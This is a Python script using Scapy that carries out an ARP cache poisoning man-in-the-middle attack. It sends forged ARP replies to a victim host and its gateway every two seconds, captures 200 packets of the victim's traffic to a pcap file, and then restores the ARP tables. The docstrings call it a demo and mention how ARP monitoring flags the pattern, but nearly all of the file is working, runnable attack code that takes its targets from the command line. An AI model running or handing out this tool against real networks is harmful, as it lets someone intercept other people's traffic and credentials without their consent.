main.py
import os
import sys
import time
from multiprocessing import Process
from scapy.all import (ARP, Ether, conf, get_if_hwaddr, send, sniff, sndrcv, srp, wrpcap)
def get_mac(ip):
    """Resolve *ip* to a MAC address with a broadcast ARP who-has request.

    Returns the Ethernet source address of the first reply received, or
    None when nothing answered within the timeout/retries given to srp().
    """
    query = Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(op='who-has', pdst=ip)
    answered, _unanswered = srp(query, timeout=2, retry=10, verbose=False)
    # Each answered entry is a (sent, received) pair. ARP replies carry no
    # authentication, so the first answer is taken at face value.
    first = next(iter(answered), None)
    if first is None:
        return None
    _sent, reply = first
    return reply[Ether].src
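class ARPoisoner:
    """ARP cache poisoning demo between one victim host and its gateway.

    Two worker processes are started by run(): one keeps sending forged
    ARP replies to both hosts, the other captures the victim's IP traffic
    to a pcap file and then puts the ARP tables back.

    On the wire this appears as unsolicited ARP is-at replies (op=2) sent
    to both hosts every two seconds, which is the pattern that ARP
    monitoring and switch-side Dynamic ARP Inspection are designed to flag.
    """

    def __init__(self, victim, gateway, interface='wlan0'):
        """Resolve both MAC addresses and select the Scapy interface.

        Args:
            victim: IP address of the host whose ARP cache is targeted.
            gateway: IP address of the gateway the victim talks to.
            interface: Interface assigned to conf.iface and used by sniff().

        Raises:
            RuntimeError: if either MAC address could not be resolved.
        """
        self.victim = victim
        self.gateway = gateway
        self.interface = interface
        # Attribute name (including its spelling) is kept for existing callers.
        self.vitctimmac = get_mac(victim)
        self.gatewaymac = get_mac(gateway)
        # restore() re-announces these addresses as hwsrc; without the real
        # values it cannot undo the poisoning, so refuse to start at all.
        for address, mac in ((victim, self.vitctimmac),
                             (gateway, self.gatewaymac)):
            if mac is None:
                raise RuntimeError(
                    f'could not resolve MAC address for {address}')
        conf.iface = interface
        conf.verb = 0

        print(f'[*] Initialized {interface}')
        print(f'[*] Gateway ({gateway}) is at {self.gatewaymac}')
        print(f'[*] Victim ({victim}) is at {self.vitctimmac}')
        print('-' * 30)

    def run(self):
        """Start the poisoning process, then the sniffing process."""
        # Despite the attribute names these are multiprocessing.Process
        # objects, not threads.
        self.poison_thread = Process(target=self.poison)
        self.poison_thread.start()

        self.sniff_thread = Process(target=self.sniff)
        self.sniff_thread.start()

    def poison(self):
        """Send forged ARP replies to victim and gateway until interrupted.

        On KeyboardInterrupt the ARP tables are restored and the process
        exits with status 1.
        """
        # Reply (op=2) telling the victim that the gateway IP is at this
        # host; hwsrc is left for Scapy to fill in.
        poison_victim = ARP()
        poison_victim.op = 2
        poison_victim.psrc = self.gateway
        poison_victim.pdst = self.victim
        poison_victim.hwdst = self.vitctimmac
        print(poison_victim.summary())
        print('-' * 30)

        # Mirror image for the gateway: the victim IP is at this host.
        poison_gateway = ARP()
        poison_gateway.op = 2
        poison_gateway.psrc = self.victim
        poison_gateway.pdst = self.gateway
        poison_gateway.hwdst = self.gatewaymac
        print(poison_gateway.summary())
        print('-' * 30)

        print('[*] Beggining ARP poisoning', end='')
        while True:
            sys.stdout.write('.')
            sys.stdout.flush()
            try:
                send(poison_victim)
                send(poison_gateway)
                # The pause sits inside the try: most of the loop's time is
                # spent here, and an interrupt during it must still restore
                # the ARP tables instead of leaving them poisoned.
                time.sleep(2)
            except KeyboardInterrupt:
                self.restore()
                sys.exit(1)

    def sniff(self, count=200):
        """Capture *count* packets to or from the victim, then clean up.

        The capture is written to 'ophidia.pcap' in the current working
        directory. It holds the victim's captured traffic, so treat the
        file as sensitive.
        """
        time.sleep(5)
        print(f'\n[*] Sniffing {count} packets', end='')
        # Use the instance attribute, not a module-level `victim` that only
        # exists when this file is run as a script.
        bpf_filter = f'ip host {self.victim}'
        try:
            packets = sniff(count=count, filter=bpf_filter,
                            iface=self.interface)
            wrpcap('ophidia.pcap', packets)
            print('\n[*] Packets succefully sniffed')
        finally:
            # Always undo the poisoning, even if capture or writing failed.
            # Stop the poisoner first to narrow the window in which a fresh
            # forged reply could follow the corrective ones.
            self.poison_thread.terminate()
            self.restore()
        print('[*] Done.')

    def restore(self):
        """Broadcast the true IP-to-MAC mappings for gateway and victim.

        Each corrective reply is sent five times to the broadcast hardware
        address.
        """
        print('[*] Restoring ARP tables...')
        # Gateway's real MAC, addressed to the victim's IP.
        send(ARP(
            op=2,
            psrc=self.gateway,
            hwsrc=self.gatewaymac,
            pdst=self.victim,
            hwdst='ff:ff:ff:ff:ff:ff'),
            count=5)
        # Victim's real MAC, addressed to the gateway's IP.
        send(ARP(
            op=2,
            psrc=self.victim,
            hwsrc=self.vitctimmac,
            pdst=self.gateway,
            hwdst='ff:ff:ff:ff:ff:ff'),
            count=5)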
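if __name__ == '__main__':
    # Three positional arguments are required; fail with a usage line
    # instead of an IndexError traceback when any are missing.
    if len(sys.argv) < 4:
        sys.exit(f'usage: {sys.argv[0]} <victim-ip> <gateway-ip> <interface>')
    (victim, gateway, interface) = (sys.argv[1], sys.argv[2], sys.argv[3])
    arpoisoner = ARPoisoner(victim, gateway, interface)
    arpoisoner.run()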